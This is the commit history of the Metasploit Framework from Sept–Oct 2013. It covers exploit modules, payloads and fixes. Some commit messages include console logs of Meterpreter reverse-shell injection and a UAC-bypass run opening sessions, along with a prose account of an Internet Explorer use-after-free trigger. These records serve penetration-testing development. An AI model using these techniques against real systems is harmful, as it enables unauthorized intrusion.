Commit Graph

11158 Commits (73e72a6488a9be9cccec13d00341f5a7cf543093)

Author SHA1 Message Date
Meatballs cad717a186
Use NDR 32bit syntax.
Compatible with both x86 and x64 systems.
Tidy up the module...
2013-10-12 18:52:45 +01:00
Joe Barrett d929bdfaab Re-fixing 8419, consistency is important. 2013-10-12 08:09:19 -04:00
darknight007 7b82c64983 ms12-020 stack print resolve 2013-10-12 16:49:03 +05:00
darknight007 e1b9f1a3c4 modified ms12-020 module to resolve stack print 2013-10-12 16:36:37 +05:00
darknight007 291b90405d Merge branch 'master' of https://github.com/darknight007/metasploit-framework
Conflicts:
	modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
2013-10-12 16:23:09 +05:00
darknight007 602fd276bc using theirs 2013-10-12 16:20:26 +05:00
darknight007 4e50c574c5 Update ms12_020_maxchannelids.rb
ms12_020_maxchannelids.rb produces a call stack when the connection is timed out. 

To reproduct, just run the module against a system having no RDP enabled.
2013-10-12 15:39:13 +05:00
joev c7bcc97dff Add SSL support to #nodejs_reverse_tcp. 2013-10-12 03:32:52 -05:00
joev 6440a26f04 Move shared Node.js payload logic to mixin.
- this fixes the recursive loading issue when creating a payload
  inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
Tod Beardsley 876d4e0aa8
Land #1420, WDS scanner 2013-10-11 16:53:25 -05:00
Tod Beardsley a1cf9619d9
Be clear this is 64-bit only in the desc. 2013-10-11 16:52:50 -05:00
MrXors 36af43a3cb Added Changes and cleaned up code 2013-10-11 14:17:50 -07:00
Tod Beardsley 181606e7cc
Single byte description update. Adds a period. 2013-10-11 15:04:25 -05:00
James Lee dfe74ce36c Factorize sock_sendpage 2013-10-11 13:40:01 -05:00
jvazquez-r7 11b6512a98
Lnad #2502, @bcoles's exploit for VMware Hyperic 2013-10-11 13:19:51 -05:00
jvazquez-r7 0b93996b05 Clean and add Automatic target 2013-10-11 13:19:10 -05:00
MrXors 66b82abb5d Cleaned up running exe func to not run when false is selected 2013-10-11 08:05:18 -07:00
MrXors 668d5cc3ae Added the option to choose to run .exe 2013-10-11 07:57:15 -07:00
jvazquez-r7 75c5e885f2 Land #2142, @morisson's exploit for CVE-2013-3319 2013-10-11 09:17:58 -05:00
jvazquez-r7 63349e4664 Add OSVDB and BID references 2013-10-11 09:14:59 -05:00
MrXors 3c8318e001 Changed Nothing Really 2013-10-11 07:10:56 -07:00
Bruno Morisson b26085457f Trying to prevent @jvazquez-r7 from crying when reading my code:
- Documented fields in the several tables;
- Fixed the "remote" field location on the fs_table (changed due to REXML parsing);
- Fixed Total Memory field on os_table  (bug?);
2013-10-11 11:29:27 +01:00
Tod Beardsley 49c629be5a
Land #2493, vbulletin exploit 2013-10-10 22:11:32 -05:00
Tod Beardsley cad7329f2d
Minor updates to vbulletin admin exploit 2013-10-10 22:09:38 -05:00
pyoor 171b70fa7c Zabbix v2.0.8 SQLi and RCE Module
Conflicts:
	modules/exploits/linux/http/zabbix_sqli.rb

Commit completed version of zabbix_sqli.rb
2013-10-10 22:50:02 -04:00
MrXors 2ee1b1c1c2 VSS Persistence on Windows 7 2013-10-10 17:20:09 -07:00
James Lee b9b2c82023 Add some entropy
* Random filename
* Stop shipping debug strings to the exploit executable

Also makes the writable path configurable, so we don't always have to
use /tmp in case it is mounted noexec, etc.
2013-10-10 18:18:01 -05:00
Meatballs 378f403fab
Land #2453, Add stdapi_net_resolve_host(s) to Python Meterpreter.
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
bcoles 276ea22db3 Add VMware Hyperic HQ Groovy Script-Console Java Execution 2013-10-11 05:07:23 +10:30
jvazquez-r7 09f0db7fdf Switch to rexml parsing, add some comments and cleanup 2013-10-10 13:19:10 -05:00
Meatballs a843722ae3 Concurrent printing of the output no longer makes sense... 2013-10-10 19:01:19 +01:00
Meatballs 536c3c7b92 Use multi railgun call for a large performance increase. 2013-10-10 19:01:14 +01:00
William Vu 9b96351ba2 Land #2494, OSVDB ref for flashchat_upload_exec 2013-10-10 12:58:55 -05:00
jvazquez-r7 9516bc5cf7 Retab changes for PR #2142 2013-10-10 11:02:51 -05:00
jvazquez-r7 cdc7b75a78 Merge for retab 2013-10-10 11:02:16 -05:00
jvazquez-r7 f10078088c Add module for ZDI-13-130 2013-10-10 10:06:17 -05:00
Bruno Morisson c264480651 Code cleanup, tried to implement suggestions from @jvazquez-r7. Hopefully is much more readable. 2013-10-10 11:58:33 +01:00
trustedsec d208ab9260 Added multiple payload capabilities
Added support to specify multiple payload delivery options.

msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   2                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    XXXXXXXX                         yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS  #<Msf::OptInt:0x007f5c6439c6d8>  no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION  1                                yes       The session to run this module on.

msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit

[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433 
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400

[*] Sending stage (770048 bytes) to XXXXXXXX

msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
James Lee 947925e3a3 Use a proper main signature with arguments
Allows us to `unlink(argv[0])`
2013-10-09 17:22:01 -05:00
trustedsec bec239abf1 Added ability to generate multiple payloads - not just one
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
Spencer McIntyre be139beb20 Remove windows from title of multi module. 2013-10-09 17:11:47 -04:00
James Lee c251596f0b Fix some bugs in preparation for factorizing
* Stop removing \x0a characters with String#scan, which of course breaks
  the shellcode
* Fork so the original session continues to work
2013-10-09 16:03:40 -05:00
Spencer McIntyre 6c382c8eb7 Return nil on error, and move the module to post/multi. 2013-10-09 16:52:53 -04:00
jvazquez-r7 e3014a1e91 Fix ZDI Reference 2013-10-09 14:56:42 -05:00
jvazquez-r7 4fd599b7e0
Land #2483, @wchen-r7's patch for [SeeRM #8458] 2013-10-09 14:32:26 -05:00
jvazquez-r7 52574b09cb Add OSVDB reference 2013-10-09 14:13:45 -05:00
jvazquez-r7 4f3bbaffd1 Clean module and add reporting 2013-10-09 13:54:28 -05:00
sinn3r 1e3b84d39b Update ie_cgenericelement_uaf 2013-10-09 13:40:48 -05:00
jvazquez-r7 5c36533742 Add module for the vbulletin exploit in the wild 2013-10-09 13:12:57 -05:00
joev 1e78c3ca1a Add missing require to nodejs/bind payload. 2013-10-09 11:39:05 -05:00
Tod Beardsley c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS) 2013-10-09 09:56:07 -05:00
Winterspite 0acb170ee8 Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00
sinn3r ef48a4b385
Land #2486 - Fix error message backtrace 2013-10-08 14:55:39 -05:00
sinn3r 199bd20b95 Update CVE-2013-3893's Microsoft reference
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
David Maloney 7d0cf73af7 Fix multi-meter_inject error msg
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.

FIXRM #8460
2013-10-08 11:11:38 -05:00
Tod Beardsley 8b9ac746db
Land #2481, deprecate linksys cmd exec module 2013-10-07 20:44:04 -05:00
sinn3r c10f0253bc Land #2472 - Clean up the way Apple Safari UXSS aux module does data collection 2013-10-07 15:47:28 -05:00
sinn3r f7f6abc1dd Land #2479 - Add Joev to the wolfpack 2013-10-07 15:30:23 -05:00
sinn3r f4000d35ba Use RopDb for ms13_069
Target tested
2013-10-07 15:24:01 -05:00
sinn3r 7222e3ca49 Use RopDb for ms13_055_canchor.
All targets tested.
2013-10-07 15:09:36 -05:00
sinn3r 67228bace8 Use RopDb for ie_cgenericelement_uaf.
All targets tested except for Vista, so additional testing will need
to be done during review.
2013-10-07 14:51:34 -05:00
Rob Fuller aed2490536 add some output and fixing 2013-10-07 15:42:41 -04:00
Rob Fuller 75d2abc8c2 integrate some ask functionality into bypassuac 2013-10-07 15:14:54 -04:00
joev 4ba001d6dd Put my short name to prevent conflicts. 2013-10-07 14:10:47 -05:00
joev ec6516d87c Deprecate misnamed module.
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
sinn3r aea63130a4 Use RopDb for ie_cbutton_uaf.
All targets tested except for Vista. Will need additional testing
during review.
2013-10-07 14:03:07 -05:00
Tod Beardsley 219bef41a7
Decaps Siemens (consistent with other modules) 2013-10-07 13:12:32 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
sinn3r e016c9a62f Use RopDb msvcrt ROP chain. Tested all targets. 2013-10-07 12:27:43 -05:00
Tod Beardsley 293927aff0
msftidy fix for coldfusion exploit 2013-10-07 12:22:48 -05:00
joev da48565093 Add more payloads for nodejs.
* Adds a reverse and bind CMD payload
* Adds a bind payload (no bind_ssl for now).
2013-10-07 06:09:21 -05:00
joev 47e7a2de83 Kill stray debugger statement. 2013-10-06 19:32:22 -05:00
joev c2a81907ba Clean up the way Apple Safari UXSS aux module does data collection.
[FIXRM #7918]
2013-10-06 19:28:16 -05:00
trustedsec 0799766faa Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:

Here is prior to the change on a fully patched Windows 8 machine:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) > 

Here's the module when running with the most recent changes that are being proposed:

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400

meterpreter > 

With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00
jvazquez-r7 24efb55ba9 Clean flashchat_upload_exec 2013-10-05 14:50:51 -05:00
bcoles 08243b277a Add FlashChat Arbitrary File Upload exploit module 2013-10-05 22:30:38 +09:30
sinn3r a8de9d5c8b Land #2459 - Add HP LoadRunner magentproc.exe Overflow 2013-10-04 19:45:44 -05:00
Tod Beardsley f9eccae391
Land #2466, don't try to lockout SMB 2013-10-04 16:47:26 -05:00
James Lee 813013fef5 Make defaults sane for the lockoutable smb_login
See #2376
2013-10-04 15:53:16 -05:00
jvazquez-r7 113f89e40f First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00
jvazquez-r7 299dfe73f1
Land #2460, @xistence's exploit for clipbucket 2013-10-04 12:26:30 -05:00
jvazquez-r7 8e0a4e08a2 Fix author order 2013-10-04 12:25:38 -05:00
Tod Beardsley ff72f0af62
Land #2461, GestioIP module 2013-10-04 11:07:08 -05:00
Tod Beardsley 9b79bb99e0 Add references, correct disclosure date 2013-10-04 09:59:26 -05:00
Tod Beardsley ab786d1466 Imply authentication when a password is set 2013-10-04 09:54:04 -05:00
Brandon Perry 0112d6253c add gestio ip module 2013-10-04 06:39:30 -07:00
jvazquez-r7 db11e88255
Land #2321, @juushya's aux module for Sentry CDU enumeration 2013-10-04 08:35:54 -05:00
xistence 81d4a8b8c1 added clipbucket_upload_exec RCE 2013-10-04 11:43:38 +07:00
jvazquez-r7 646429b4dd Put ready to pull request 2013-10-03 22:15:17 -05:00
jvazquez-r7 5971fe87f5 Improve reliability 2013-10-03 17:19:53 -05:00
jvazquez-r7 39eb20e33a Add module for ZDI-13-169 2013-10-03 16:52:20 -05:00
Karn Ganeshen 37e1e6533c changed default options
Updated these default options to false:
      'DB_ALL_CREDS'    => false
      'BLANK_PASSWORDS' => false
2013-10-04 02:48:42 +05:30
sinn3r 8059c59f15 Land #2452 - Ignore unexpected DNS answers 2013-10-03 15:54:22 -05:00
sinn3r c87e7b3cc1 Land #2451 - Don't overwrite default timeout on get_once 2013-10-03 15:44:40 -05:00
Tod Beardsley 539a22a49e
Typo on Microsoft 2013-10-03 12:20:47 -05:00
Tod Beardsley fcba424308
Kill off EOL spaces on astium_sqli_upload. 2013-10-03 11:01:27 -05:00
Karn Ganeshen 8aac3922f3 add radware_appdirector_enum
This module scans for Radware AppDirector's web login portal, and performs login brute force to identify valid credentials.

- mstidy.tb & retab.rb run done
- stop_on_success is set to true. Important, otherwise the app starts dropping bf source.
- slowing down brute force speed seems to work though, but can take a long time if more creds to check &| more targets
- better to run bf with 2-3 creds against range, & then come back with more creds if needed
2013-10-03 20:15:52 +05:30
jvazquez-r7 1fe0c50df0 Ignore unexpected answers 2013-10-02 20:41:02 -05:00
jvazquez-r7 0db93111de
Land #2445, @todb-r7's new tab warning for msftidy 2013-10-02 17:19:12 -05:00
Tabassassin 773abf0567
Pow, tab assassinated. 2013-10-02 17:16:38 -05:00
jvazquez-r7 77d0236b4e Don't overwrite defaul timeout 2013-10-02 16:15:14 -05:00
Meatballs c460f943f7
Merge branch 'master' into data_dir
Conflicts:
	modules/exploits/windows/local/always_install_elevated.rb
	plugins/sounds.rb
	scripts/meterpreter/powerdump.rb
	scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
sinn3r 23b0c3b723 Add Metasploit blog references
These modules have blogs from the Rapid7 community, we should add them.
2013-10-01 20:50:16 -05:00
sinn3r 932ed0a939 Land #2444 - Add SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Vuln 2013-10-01 20:35:17 -05:00
jvazquez-r7 ed82be6fd8 Use RopDB 2013-10-01 13:23:09 -05:00
jvazquez-r7 6483c5526a Add module for OSVDB 93696 2013-10-01 11:42:36 -05:00
sinn3r 9abf727fa6 Land #2439 - Update description 2013-09-30 16:03:15 -05:00
sinn3r 7118f7dc4c Land #2422 - rm methods peer & rport
Because they're already defined in the HttpClient mixin
2013-09-30 16:01:59 -05:00
Brandon Turner 3cfee5a7c0
Land #2440, remaining tabassassin changes 2013-09-30 14:30:50 -05:00
jvazquez-r7 6c8f86883d
Land #2437, @wchen-r7's exploit for CVE-2013-3893 2013-09-30 14:02:29 -05:00
Tab Assassin 2e8d19edcf Retab all the things (except external/) 2013-09-30 13:47:53 -05:00
Tod Beardsley 4dc88cf60f Expand descriptions for ease of use. 2013-09-30 13:30:31 -05:00
sinn3r c82ed33a95 Forgot Math.cos() 2013-09-30 13:29:16 -05:00
sinn3r d6cd0e5c67 Tweak for office 2007 setup 2013-09-30 13:27:59 -05:00
sinn3r ecf4e923e8 Change the target address for spray 1 2013-09-30 11:57:59 -05:00
Tod Beardsley 9ada96ac51
Fix sqlmap accidental codepoint
See http://www.ruby-doc.org/core-1.9.3/String.html#method-i-3C-3C

Apparently, String#<< uses Integer#chr, not Integer#to_s. News to me.

Fixed originally by @TsCl in PR #2435, but fixing seperately in order to
avoid screwing up his downstream tracking. Note, this isn't a merge, so
using Closes tag on the commit message.

[Closes #2435]
2013-09-30 11:23:17 -05:00
darknight007 f1ab7b51b1 Update ms12_020_maxchannelids.rb
ms12_020_maxchannelids.rb produces a call stack when the connection is timed out. 

To reproduct, just run the module against a system having no RDP enabled.
2013-09-30 13:43:26 +05:00
sinn3r b9aae1c93c Higher address seems better 2013-09-29 18:45:30 -05:00
sinn3r a5ade93ab2 Add CVE-2013-3893 Internet Explorer SetMouseCapture Use-After-Free
This module exploits a use-after-free vulnerability that currents
targets Internet Explorer 9 on Windows 7, but the flaw should exist in
versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but
other regions such as English, Chinese, Korean, etc, were targeted as
well.

The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function
handles a reference during an event. An attacker first can setup two
elements, where the second is the child of the first, and then setup a
onlosecapture event handler for the parent element. The onlosecapture
event seems to require two setCapture() calls to trigger, one for the parent
element, one for the child. When the setCapture() call for the child element
is called, it finally triggers the event, which allows the attacker to cause
an arbitrary memory release using document.write(), which in particular frees
up a 0x54-byte memory. The exact size of this memory may differ based on the
version of IE. After the free, an invalid reference will still be kept and pass
on to more functions, eventuall this arrives in function
MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution)
when this function attempts to use this reference to call what appears to be a
PrivateQueryInterface due to the offset (0x00).

To mimic the same exploit found in the wild, this module will try to use the
same DLL from Microsoft Office 2007 or 2010 to leverage the attack.
2013-09-29 18:24:13 -05:00
Meatballs b306415ecf
Tidy and updates to info 2013-09-29 17:32:39 +01:00
Meatballs 29a7059eb4
Update AlwaysInstallElevated to use a generated MSI file
Fixes bugs with MSI::UAC option, invalid logic and typo...
2013-09-29 17:09:03 +01:00
Tod Beardsley 7cc2ad55a6
Land #1770, unattend.xml snarfing modules 2013-09-27 16:04:38 -05:00
Tod Beardsley 63d638888d Get rid of interior tabs 2013-09-27 16:04:03 -05:00
Tod Beardsley d869b1bb70 Unless, unless everywhere. 2013-09-27 15:55:57 -05:00
Tod Beardsley ae655e42d2 Touchups: boolean check, unless, and TODO comment 2013-09-27 15:54:03 -05:00
Tod Beardsley 37e4d58f4a Call CSV text/plain so it can be viewed normally
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
Tod Beardsley 5e77dccd48 Add a ref to an example unattend.xml 2013-09-27 15:45:57 -05:00
Meatballs 8b800cf5de Merge and resolve conflicts 2013-09-27 18:19:23 +01:00
jvazquez-r7 58600b6475
Land #2423, @TecR0c's exploit for OSVDB 96517 2013-09-27 09:48:52 -05:00
jvazquez-r7 6381bbfd39 Clean up freeftpd_pass 2013-09-27 09:47:39 -05:00
TecR0c b02a2b9ce0 Added crash info and basic tidy up 2013-09-27 17:05:42 +10:00
TecR0c 7dbc3f4f87 changed seh address to work on freeFTPd 1.0.10 and below 2013-09-27 12:37:52 +10:00
TecR0c 5fc98481a7 changed seh address to work on freeFTPd 1.0.10 and below 2013-09-27 12:35:03 +10:00
TecR0c a6e1bc61ec updated version in exploit freeFTPd 1.0.10 2013-09-27 11:27:51 +10:00
TecR0c 3a3f1c0d05 updated requested comments for freeFTPd 1.0.10 2013-09-27 11:13:28 +10:00
Meatballs 3d812742f1 Merge upstream master 2013-09-26 21:27:44 +01:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
jvazquez-r7 813bd2c9a5
Land #2379, @xistence's exploit for OSVDB 88860 2013-09-26 13:52:15 -05:00
Meatballs a25833e4d7 Fix %TEMP% path 2013-09-26 19:22:36 +01:00
William Vu acb2a3490c Land #2419, nodejs_js_yaml_load_code_exec info 2013-09-26 12:55:48 -05:00
Tod Beardsley 8696b5d2dc
Fix bug on missing hosts for SunRPC Portmap
Also cleans up and normalizes the print messages to follow the
conventions of "host:port - proto - message"

[FixRM #8409], reported by Chris F.
2013-09-26 09:42:38 -05:00
jvazquez-r7 b618c40ceb Fix English 2013-09-26 09:00:41 -05:00
TecR0c 0339c3ef48 added freeFTPd 1.0.10 (PASS Command) 2013-09-26 20:37:23 +10:00
xistence c2ff5accee stability fixes to astium_sqli_upload 2013-09-26 10:23:33 +07:00
FireFart 09fa7b7692 remove rport methods since it is already defined in Msf::Exploit::Remote::HttpClient 2013-09-25 23:50:34 +02:00
FireFart 84ec2cbf11 remove peer methods since it is already defined in Msf::Exploit::Remote::HttpClient 2013-09-25 23:42:44 +02:00
jvazquez-r7 58d4096e0f Resolv conflicts on #2267 2013-09-25 13:06:14 -05:00
jvazquez-r7 ff610dc752 Add vulnerability discoverer as author 2013-09-25 12:45:54 -05:00
jvazquez-r7 5c88ad41a8 Beautify nodejs_js_yaml_load_code_exec metadata 2013-09-25 12:44:34 -05:00
FireFart 34b829abef bugfix 2013-09-25 09:15:07 +02:00
joev 99e46d2cdb Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
Conflicts:
	modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
joev cd98c4654d Remove unecessary print from #generate in payloads. 2013-09-25 00:12:28 -05:00
Tod Beardsley d91cb85a31
Not actually a typo
Turns out, the object name is "CCaret," though we're talking about the
"caret." Confuz0ring!
2013-09-24 15:55:52 -05:00
Tod Beardsley ac1388368f
Typo in module name 2013-09-24 15:50:58 -05:00
jvazquez-r7 a50ab1ddd3
Land #2409, @xistence exploit for ZeroShell 2013-09-24 15:32:55 -05:00
jvazquez-r7 6c2063c9c0 Do not get a session on every execute_command call 2013-09-24 15:31:40 -05:00
jvazquez-r7 79ca123051 Use snake_case 2013-09-24 15:16:51 -05:00
jvazquez-r7 34b84395c1 Fix References field 2013-09-24 15:16:02 -05:00
Tod Beardsley 93486a627d Whoops on trailing commas 2013-09-24 15:14:11 -05:00
jvazquez-r7 adfacfbed1 Do not fail_with on method used from check 2013-09-24 15:08:48 -05:00
jvazquez-r7 4b6a646899 Fix typo 2013-09-24 15:06:35 -05:00
jvazquez-r7 f5cac304f4 Use default send_request_cgi timeout 2013-09-24 15:05:24 -05:00
William Vu 52a92a55ce Land #2394, ms13_005_hwnd_broadcast require fix 2013-09-24 13:43:21 -05:00
jvazquez-r7 ce4cf55d22
Land #2417, @todb-r7's change to Platform field to make ruby style compliant 2013-09-24 13:30:48 -05:00
William Vu 89222f4b16 Land #2416, OSVDB refs for arkeia_upload_exec 2013-09-24 13:22:24 -05:00
Tod Beardsley 3906d4a2ca Fix caps that throw msftidy warnings 2013-09-24 13:03:16 -05:00
Tod Beardsley f47d4d7927 Revert change for resolve_hosts after #2415 2013-09-24 12:47:00 -05:00
jvazquez-r7 7eecf7e6f0
Land #2415, @Meatballs1's fix for resolve_hosts platform list 2013-09-24 12:37:03 -05:00
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Meatballs1 4b4ab3a6a0 Remove Linux Plat from ResolveHosts 2013-09-24 12:00:53 -05:00
Tod Beardsley 081c279b61 Remove misleading comment 2013-09-24 11:42:31 -05:00
jvazquez-r7 d15f442e56 Add OSVDB references to arkeia_upload_exec 2013-09-24 08:48:28 -05:00
FireFart aeb663a5d4 fix output 2013-09-24 10:48:38 +02:00
FireFart dc8f94bac1 Added wordpress version detection 2013-09-24 08:59:56 +02:00
xistence 8b9adf6886 changes made to zeroshell_exec according to suggestions 2013-09-24 08:35:07 +07:00
Tod Beardsley 8db1a389eb
Land #2304 fix post module require order
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
Tod Beardsley e885ab45b6
Land #1734 Metasploit side for ip resolv 2013-09-23 16:18:40 -05:00
Tod Beardsley 2656c63459 Knock out a Unicode character 2013-09-23 14:22:11 -05:00
Tod Beardsley 99f145cbff Don't split the post requires 2013-09-23 14:02:43 -05:00
Tod Beardsley 4bff8f2cdc Update descriptions for clarity. 2013-09-23 13:48:23 -05:00
William Vu a46ac7533d Land #2407, require fix for current_user_psexec 2013-09-23 11:57:19 -05:00
jvazquez-r7 1fc849bdd5 Land #2188, @m-1-k-3's module for OSVDB 90221 2013-09-23 11:44:43 -05:00
jvazquez-r7 71d74655f9 Modify description 2013-09-23 11:44:04 -05:00
Joe Vennix 801dda2b09 Change PayloadType to NodeJS. 2013-09-23 11:31:45 -05:00
xistence 6429219a1d added ZeroShell RC2 RCE 2013-09-22 15:13:55 +07:00
xistence 41e1a3d05b removed shell prompt in lua bind/reverse shells 2013-09-22 14:53:59 +07:00
jvazquez-r7 8417b916c7 Complete MS13-071 Information 2013-09-21 21:22:34 -05:00
darknight007 6b06ed0df1 Update current_user_psexec.rb 2013-09-22 03:07:17 +05:00
Joe Vennix a08d195308 Add Node.js as a platform.
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
Joe Vennix 49f15fbea4 Removes PayloadType from exploit module. 2013-09-20 18:01:55 -05:00
sinn3r 8381bf8646 Land #2404 - Add powershell support for current_user_psexec 2013-09-20 17:14:55 -05:00
sinn3r 96364c78f8 Need to catch RequestError too
Because a meterpreter session may throw that
2013-09-20 17:13:35 -05:00
